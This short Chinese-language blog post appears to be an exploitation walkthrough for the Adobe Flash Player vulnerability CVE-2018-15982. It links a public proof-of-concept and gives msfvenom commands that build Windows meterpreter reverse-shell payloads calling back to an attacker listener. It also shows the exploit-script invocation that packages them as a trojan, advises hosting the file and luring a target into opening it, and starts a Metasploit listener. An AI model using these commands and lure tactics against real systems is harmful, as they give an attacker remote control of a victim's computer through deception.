漏洞介绍
Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。
漏洞演示
木马制作
Poc: https://github.com/yangb92/CVE-2018-15982_EXP1
2
3msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.22 LPORT=4444 -f raw>86.bin
msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.22 LPORT=4444 -f raw>64.bin
python CVE_2018_15982.py -i 86.bin -I 64.bin
将木马文件托管在http服务器上面, 将链接分享给目标,诱导目标打开.
MSF监听
1 | msfconsole |
If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !